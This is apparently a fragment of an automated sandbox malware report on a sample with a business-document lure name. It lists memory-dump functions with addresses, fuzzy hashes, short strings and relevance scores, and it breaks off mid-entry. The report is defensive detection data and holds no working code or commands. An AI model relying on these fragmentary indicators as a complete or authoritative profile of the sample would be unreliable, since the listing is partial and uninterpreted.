Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: TJp
API String ID: 0-1978589728
Opcode ID: 0adb618515594efbafcec4c667f89b4b74e1e6efcc1d9d82515bd91e04d5bb49
Instruction ID: ce483aff482c31b359c8704f1139e75ecdcc10e464ea6dc95c5543313238ea32
Opcode Fuzzy Hash: 0adb618515594efbafcec4c667f89b4b74e1e6efcc1d9d82515bd91e04d5bb49
Instruction Fuzzy Hash: 6F510274E00248DFEB14DFA9D8586EDBBB1FF89300F20806AE416A73A4DB385A55CF15

Uniqueness

Uniqueness Score: -1.00%

Function 01EF0040 Relevance: 1.4, Strings: 1, Instructions: 134COMMON

Download Yara Rule

Strings

4'p, xrefs: 01EF007A

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: 4'p
API String ID: 0-481844870
Opcode ID: 211787eb14c2b95b7f76c28269d4e30b55ad1f70bc8c1d6a82d69214e3241ef1
Instruction ID: 171d9b8c63f8e8e5ab81a84ce8778bb55d24984be2048276618ab2ad75944570
Opcode Fuzzy Hash: 211787eb14c2b95b7f76c28269d4e30b55ad1f70bc8c1d6a82d69214e3241ef1
Instruction Fuzzy Hash: 15419130B106159FCB19EB68C8A4A6EB7B7AFD8700F10441DE507AB3A8CF759C46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01F12459 Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

TJp, xrefs: 01F12372

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: TJp
API String ID: 0-1978589728
Opcode ID: 1ac13184da6d5b189501b7691365800d5969e96a9896c0daa60460fb55653bb1
Instruction ID: 259b1d25db7245a8b6c3e89a96fb6fb3ebe3310ec46d9b39a1775b56115a10ad
Opcode Fuzzy Hash: 1ac13184da6d5b189501b7691365800d5969e96a9896c0daa60460fb55653bb1
Instruction Fuzzy Hash: D051F374E01208DFDB14DFA8E844AADBBB1FF49300F2080AAE416A7365DB355A55CF55

Uniqueness

Uniqueness Score: -1.00%

Function 01F12298 Relevance: 1.4, Strings: 1, Instructions: 124COMMON

Download Yara Rule

Strings

TJp, xrefs: 01F12372

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: TJp
API String ID: 0-1978589728
Opcode ID: 515b15c0436afcc9b1103ffaac299a3ee3dd3efb66be218772d5ed1dd33a3124
Instruction ID: 717af4ad2780086b7c05db2d77a142f41b81b21fea12ccac7d264941102a18ba
Opcode Fuzzy Hash: 515b15c0436afcc9b1103ffaac299a3ee3dd3efb66be218772d5ed1dd33a3124
Instruction Fuzzy Hash: 2551D074E00208DFDB14DFA9D8586EDBBB1FF89300F20806AE816A7364DB745A55CF55

Uniqueness

Uniqueness Score: -1.00%

Function 04C8EC80 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,?,?), ref: 04C8ED1F

Memory Dump Source

Source File: 00000000.00000002.359111117.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c80000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 8135d50e525c758b7111b17285923d4f1e8af793d522605d4e3b42f3d09aaeae
Instruction ID: 39e9063521d21983bb2034515a6141282221fabef0a79a33c7f9f55e21fa6cdb
Opcode Fuzzy Hash: 8135d50e525c758b7111b17285923d4f1e8af793d522605d4e3b42f3d09aaeae
Instruction Fuzzy Hash: 9D3188B9D012489FCF10CFA9E984AAEFBB1AF49314F24942AE814B7214D735A945CF94

Uniqueness

Uniqueness Score: -1.00%

Function 01F1C6F9 Relevance: 1.3, Strings: 1, Instructions: 92COMMON

Download Yara Rule

Strings

4'p, xrefs: 01F1C741

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: 4'p
API String ID: 0-481844870
Opcode ID: 58e30c8cf465434eacc712934b51fd753cdad7b3ee3ffd24ae61170c78d4a6bd
Instruction ID: d952288f12c9635f0177e1280fda6707a56143e8aaa3f486ece4d16bae29e804
Opcode Fuzzy Hash: 58e30c8cf465434eacc712934b51fd753cdad7b3ee3ffd24ae61170c78d4a6bd
Instruction Fuzzy Hash: 3B317536A00205DFCF199F64D854A5D7BB2FF88320F154169E6069B375CB75DC52CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01EF0021 Relevance: 1.3, Strings: 1, Instructions: 90COMMON

Download Yara Rule

Strings

4'p, xrefs: 01EF007A

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: 4'p
API String ID: 0-481844870
Opcode ID: 9ee1c37ded18301a06794df8e96336eed7c0a6ff943ee64046ddddb5b2bb00a2
Instruction ID: d5cd789c1b3e992b9bd43ce21c5c93c002d159ecf11b3e59e186e3911c2d73f2
Opcode Fuzzy Hash: 9ee1c37ded18301a06794df8e96336eed7c0a6ff943ee64046ddddb5b2bb00a2
Instruction Fuzzy Hash: E131B130B102159FDB19AB688C696BEBBB7AFD9710F04402EE907DB3A5CE744C06C791

Uniqueness

Uniqueness Score: -1.00%

Function 046ADAF8 Relevance: 1.3, Strings: 1, Instructions: 76COMMON

Download Yara Rule

Strings

p<p, xrefs: 046ADB3A

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: p<p
API String ID: 0-2671882351
Opcode ID: 9debedfa9c9a1582b31903553008f6b0ca8d5069f64cb206e392c3f8908f86fe
Instruction ID: b777c77cd33b5e7b00985906fbba40a581f0113ec704c6b961c8bfd389676026
Opcode Fuzzy Hash: 9debedfa9c9a1582b31903553008f6b0ca8d5069f64cb206e392c3f8908f86fe
Instruction Fuzzy Hash: AF216DB53045449FCB11CF2AC884AAA7BF6AF9A300F094095FD44CB771DA35EC61DB60

Uniqueness

Uniqueness Score: -1.00%

Function 046ADAF1 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

p<p, xrefs: 046ADB3A

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: p<p
API String ID: 0-2671882351
Opcode ID: 93a6e433bebd5e0149318db0aba7ef031b1741c80fe4279b972299f1b8395993
Instruction ID: 9d364673208cbffdc9049de90e4be82fb022377aead648b02db9f6d514f9ddd8
Opcode Fuzzy Hash: 93a6e433bebd5e0149318db0aba7ef031b1741c80fe4279b972299f1b8395993
Instruction Fuzzy Hash: 5E217CB13006449FCB55DF29C8849AA7BF6AF8A714B054195F815CB3B0DA35EC62DF20

Uniqueness

Uniqueness Score: -1.00%

Function 01EF1160 Relevance: 1.3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

Strings

(p, xrefs: 01EF11BC

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: (p
API String ID: 0-4175582459
Opcode ID: 2870656fa560a0d72ebdc1308e00f20e0b4f49d76f7f274189580044b8bd56a3
Instruction ID: 3a4b8089bcbb8a0fa115c40393f87210691b4a19eb3a0f4665bfcf3d64951a40
Opcode Fuzzy Hash: 2870656fa560a0d72ebdc1308e00f20e0b4f49d76f7f274189580044b8bd56a3
Instruction Fuzzy Hash: E1216072614250AFCB4A8F68D814C5D7FB6EF8A32031A81DAE615CB372C636DC15DB91

Uniqueness

Uniqueness Score: -1.00%

Function 058B1196 Relevance: 1.3, Strings: 1, Instructions: 29COMMON

Download Yara Rule

Strings

., xrefs: 058B1223

Memory Dump Source

Source File: 00000000.00000002.359245806.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_58b0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: ba5da42e53508bbeb5bc0b3fdc859f8d3491256b6a3a12423f43536b277f69e3
Instruction ID: 8015e021c7087f975160f841be615c6671ec62adc608ad620f25cab56e058ff8
Opcode Fuzzy Hash: ba5da42e53508bbeb5bc0b3fdc859f8d3491256b6a3a12423f43536b277f69e3
Instruction Fuzzy Hash: 1C011278A00229CFCB69EF58C994ACAB7B1FB48301F0040E9E419A7364DB345E82CF40

Uniqueness

Uniqueness Score: -1.00%

Function 046A74C6 Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

H7>, xrefs: 046A74C6

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: H7>
API String ID: 0-3501111541
Opcode ID: 80b605044a64b656d5dc04dce8dad720c7542f59d73147708944eb70641bcee6
Instruction ID: f3249e1e44242a8be61a89865a39bc8ee8c07aefc5b75f2f60bb43939b231d76
Opcode Fuzzy Hash: 80b605044a64b656d5dc04dce8dad720c7542f59d73147708944eb70641bcee6
Instruction Fuzzy Hash: 1DF03778A01228DFCB11DF58E894BACB7B1FB45300F0402A9E549A7380D7756E41CF01

Uniqueness

Uniqueness Score: -1.00%

Function 046A76D3 Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

Tep, xrefs: 046A7726

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: Tep
API String ID: 0-914316021
Opcode ID: afe0206b9141e829bcd83266f52a5a020cdab52914fa6245e3cce650ac055a2e
Instruction ID: c901b98f4ec8ca72f3bfa29de546b096bd2284ec56854a6daef02fee13383313
Opcode Fuzzy Hash: afe0206b9141e829bcd83266f52a5a020cdab52914fa6245e3cce650ac055a2e
Instruction Fuzzy Hash: 78F0C974A00268CFCB65EF65D85079EB7B2FB98300F1041A9D44A97354DB345E85DF51

Uniqueness

Uniqueness Score: -1.00%

Function 046A6F44 Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

J>, xrefs: 046A6F44

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: J>
API String ID: 0-801517240
Opcode ID: fa2e03b3eb33efc44adfddbeec3876d04636b526f98357dee2d6f3858073ac3f
Instruction ID: e1e2d4c8436755bad01bbc7df5d8f17159b032c47af23774e026ac92defe804a
Opcode Fuzzy Hash: fa2e03b3eb33efc44adfddbeec3876d04636b526f98357dee2d6f3858073ac3f
Instruction Fuzzy Hash: BAF06D34E04219CFDB21DF58E884BACB7B2FB48300F0406A8E149A7392E7346D80CF40

Uniqueness

Uniqueness Score: -1.00%

Function 046A73F8 Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

\Q>, xrefs: 046A73F8

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: \Q>
API String ID: 0-4163272568
Opcode ID: 76f91dc60bff2cafb76bfdef600c2ef1da21fbeef0329dd8bcf7b0985154ad4a
Instruction ID: 55f0abefc7176868c9680441854a90a226d5c2545b5a319c6f04f77d7734ba4c
Opcode Fuzzy Hash: 76f91dc60bff2cafb76bfdef600c2ef1da21fbeef0329dd8bcf7b0985154ad4a
Instruction Fuzzy Hash: FAF04934E11118DFDB14DF54E894B8DB7B2FB04304F004195E949A7391DB34AE90CF00

Uniqueness

Uniqueness Score: -1.00%

Function 046A465E Relevance: 1.3, Strings: 1, Instructions: 25COMMON

Download Yara Rule

Strings

', xrefs: 046A466E

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: '
API String ID: 0-1997036262
Opcode ID: 286dd8f91bacd134d502cce04c3708e0ebc721d0528845d139cfbe04c05b8409
Instruction ID: 68b579fe2b87120b1232b67b28b381775c9cfbf8eca06ff2be7d0877603bfc13
Opcode Fuzzy Hash: 286dd8f91bacd134d502cce04c3708e0ebc721d0528845d139cfbe04c05b8409
Instruction Fuzzy Hash: CAF0D474904A58DBDB20CF559C483DABBB1AB46306F1080E6D04EA2250E7342EA98F12

Uniqueness

Uniqueness Score: -1.00%

Function 046A775E Relevance: 1.3, Strings: 1, Instructions: 16COMMON

Download Yara Rule

Strings

0M>, xrefs: 046A775E

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: 0M>
API String ID: 0-1604063329
Opcode ID: dcfd500a1e0bfbcf812aaf2d05f3b9c6ca6539ec7bb550440e06bd96aa00af61
Instruction ID: 7b8ba76d864503fc989fb1e32b56e9468906ef90e3f54b6ba4cbb57c4e6782dd
Opcode Fuzzy Hash: dcfd500a1e0bfbcf812aaf2d05f3b9c6ca6539ec7bb550440e06bd96aa00af61
Instruction Fuzzy Hash: F3E07574A1126CCFD7269B64ED5479A77B1FB49700F4002A9944DA72A5DB346E81CF02

Uniqueness

Uniqueness Score: -1.00%

Function 046A5863 Relevance: 1.3, Strings: 1, Instructions: 16COMMON

Download Yara Rule

Strings

C, xrefs: 046A586F

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: C
API String ID: 0-1037565863
Opcode ID: 82fb791d87b6839a310e9d46f9c9d1be525c31a7e3ac8248e87a8b01e6da87e1
Instruction ID: 5c489fbe9a661eea22b0cafaf73a1914470cffc489f72182288dbfa09b6097d7
Opcode Fuzzy Hash: 82fb791d87b6839a310e9d46f9c9d1be525c31a7e3ac8248e87a8b01e6da87e1
Instruction Fuzzy Hash: D7E0C2B4904A68CFDB308F10DC883CAB7B1BB0430AF4010E9E10EA2290E3742ED5CE16

Uniqueness

Uniqueness Score: -1.00%

Function 01EF0280 Relevance: .4, Instructions: 437COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47186a290f2258cd090c3f596838fef55f0d835b907d0c19ce1819b56ca2dfd5
Instruction ID: 5a52eaad62e1f41f81d9ca939fa841769c0710f56ef3b2490189f509d6dd4e8b
Opcode Fuzzy Hash: 47186a290f2258cd090c3f596838fef55f0d835b907d0c19ce1819b56ca2dfd5
Instruction Fuzzy Hash: 54121F34A002198FDB14EF68C894B9DBBB2BF89300F5185A8E949AB355DF71ED85CF40

Uniqueness

Uniqueness Score: -1.00%

Function 046AA638 Relevance: .2, Instructions: 246COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d82c0cb55c77ac9d15b61425197084c781ca6269139ebf6f55a3fbed4778acd
Instruction ID: 1deb74122fa945f7b905143746b106c6910ef4163151e70a60df0c2bc99cc0cc
Opcode Fuzzy Hash: 1d82c0cb55c77ac9d15b61425197084c781ca6269139ebf6f55a3fbed4778acd
Instruction Fuzzy Hash: E4917B39B01A049FDB14DFA9D544AADB7F2EF88311F24806AE81597390DB31ED52CF90

Uniqueness

Uniqueness Score: -1.00%

Function 001E2308 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356207478.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a75a3056419907b93b2c1dae63140ca310d00cbc1eed06ce4486e892eaef630
Instruction ID: 3447c6b624efded3bcff6c302a3469e8fcb91984f6fefc6a269127bcc231fde0
Opcode Fuzzy Hash: 5a75a3056419907b93b2c1dae63140ca310d00cbc1eed06ce4486e892eaef630
Instruction Fuzzy Hash: 66314B35A006448FC704DF6AC595A9DBBF5FF48310B2584A9E409EB362D731EC02CF90

Uniqueness

Uniqueness Score: -1.00%

Function 058CDEE0 Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359245806.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_58b0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f071ba1dfd5d2de8ba4aa3ed3ce9b4d3eeca6a5a959a4f4cdafefb24bee29648
Instruction ID: e6b89b551c4ffd98a71d871152245327e1978c0a477c99e09e5bf5b2dfbaeb62
Opcode Fuzzy Hash: f071ba1dfd5d2de8ba4aa3ed3ce9b4d3eeca6a5a959a4f4cdafefb24bee29648
Instruction Fuzzy Hash: F7A11274E0524CCFCB15EFA9D5446ADBBB6FB48305F20816AE816AB344C774AE42CF91

Uniqueness

Uniqueness Score: -1.00%

Function 01EF9ECF Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 042bf53de08e0e625e0364ca2a9e4f484709561cf97642a1ceacff47ae09e613
Instruction ID: 87166b190972cfa6e38bee3de90dfad66776ba4fc7b3e8e7a5448e8ad73def68
Opcode Fuzzy Hash: 042bf53de08e0e625e0364ca2a9e4f484709561cf97642a1ceacff47ae09e613
Instruction Fuzzy Hash: DA916874E05218CFDB14DFA8E9407ADBBF1FB89304F10616AE94AAB295CB355E85CF00

Uniqueness

Uniqueness Score: -1.00%

Function 01EF4558 Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1a5a3402053f3c858f55608b2e606b41e60a65d3b6a4b6323a15457c15c8f0b
Instruction ID: 385eb8879a06b3f99289046e7bc94c2c7b7d3b3b014236c696484c0cc378a298
Opcode Fuzzy Hash: c1a5a3402053f3c858f55608b2e606b41e60a65d3b6a4b6323a15457c15c8f0b
Instruction Fuzzy Hash: 7791FD71A007049FCB25DF69C844AAEBBF2FF88314F14855DEA4687690EB30E906CF51

Uniqueness

Uniqueness Score: -1.00%

Function 046AFC70 Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7616cb7ae85a57a8c57f813d664f7dce9db5cc561e465e215f37522aec631cfa
Instruction ID: 8e3ce810b51195f4b0de0ddb0cebf76b087467039499c2874b0d4c95278f8eb8
Opcode Fuzzy Hash: 7616cb7ae85a57a8c57f813d664f7dce9db5cc561e465e215f37522aec631cfa
Instruction Fuzzy Hash: 41811975A00614DFCB29DF68C484A9DBBF5BF88710B15856AE8069B361EB30FD42CF91

Uniqueness

Uniqueness Score: -1.00%

Function 01EF7CF5 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b909398cb9f0163406bd004b1994ce250900c503eeaaa7172f42d990bd6b81f
Instruction ID: 2dd4e2e815381347a64c1d3734ef63b71ca0893796050c70844b1380b5c2defe
Opcode Fuzzy Hash: 1b909398cb9f0163406bd004b1994ce250900c503eeaaa7172f42d990bd6b81f
Instruction Fuzzy Hash: 13713A34E05208CFDB04DFA9E594BEDBBB6FB8A304F14A12DD909AB295DB765941CF00

Uniqueness

Uniqueness Score: -1.00%

Function 01EF1228 Relevance: .2, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87cf5a3605224f3f3770a38ff8cde9918feae4d6f7871651c55648be6fdbdd49
Instruction ID: 4dbf21a98dccef356d7ee1f0bb57eeb39fa4e23c8bfcf89635de4671934a0058
Opcode Fuzzy Hash: 87cf5a3605224f3f3770a38ff8cde9918feae4d6f7871651c55648be6fdbdd49
Instruction Fuzzy Hash: 38713B30B10615DFDB15DF68D898A6EBBB6EF89700F148069E906DB3A5CB30DC46CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01EFFBC0 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d9ebcc6fbfe7bb052633273e47f16924799edccf8b676178e779bac0658a3d1
Instruction ID: 3c22861c59cf6a5c813c128bcb87264fa9968ef99f8c4db43733f32c6b7af0bf
Opcode Fuzzy Hash: 2d9ebcc6fbfe7bb052633273e47f16924799edccf8b676178e779bac0658a3d1
Instruction Fuzzy Hash: E1813571E05218CFEB18CFA9E5947ECBBF2FB48304F14A16AD909AB255DB351985CF04

Uniqueness

Uniqueness Score: -1.00%

Function 046A79EB Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4942738e27fb24eb50c316ce83b4f2c99f305d03537897e570d7cbc7db14152
Instruction ID: 59240d7aa1a3e717fe3e3abf38e61fd18df013b9ede12b47d48640ec2680be1f
Opcode Fuzzy Hash: c4942738e27fb24eb50c316ce83b4f2c99f305d03537897e570d7cbc7db14152
Instruction Fuzzy Hash: 9E413B9AC08AC5BFD7124AF458901E87FA0DB37223F0845E6D7418A2D3F265FF278A15

Uniqueness

Uniqueness Score: -1.00%

Function 01EF121A Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 445f5f1a042e5a92be8cbc68dd06d27b66c72164af63d3e1d15c0684b6de3a12
Instruction ID: 3d7c0ab23a086232b24ad4891473069b59b79c65a7165bc149b429841eb9e30b
Opcode Fuzzy Hash: 445f5f1a042e5a92be8cbc68dd06d27b66c72164af63d3e1d15c0684b6de3a12
Instruction Fuzzy Hash: 5D611835B10615DFDB14DF68D898A6DBBB6FF88710F1481A9E9069B3A5CB30EC41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01F1CE50 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db8c9792e82f0bc90961d4a51ad003c71f174e92e4d7826f727fd512e9b39467
Instruction ID: 4f2d3d0732825b83fe1f580605857802958bdf76e57e52f81d1ff3773ef9ff32
Opcode Fuzzy Hash: db8c9792e82f0bc90961d4a51ad003c71f174e92e4d7826f727fd512e9b39467
Instruction Fuzzy Hash: 2E516334B0050AEFCB15EF65E858AAEB7B6FF88701F00811AF5029B364DF709946CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01EF4128 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5d97df00794daefdcc9567cc3596d32506893fcbb54359180509bbcaf547bf4
Instruction ID: 66ad28fb0cc711f35f443fc0b75b5dbf31544413dbf9762be6e9615b3829a723
Opcode Fuzzy Hash: e5d97df00794daefdcc9567cc3596d32506893fcbb54359180509bbcaf547bf4
Instruction Fuzzy Hash: 0641DC31F00B149FCB64CB7CE54429FB7F2EF84614B04886ED55AC7A94EB34E9068B81

Uniqueness

Uniqueness Score: -1.00%

Function 001E2450 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356207478.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
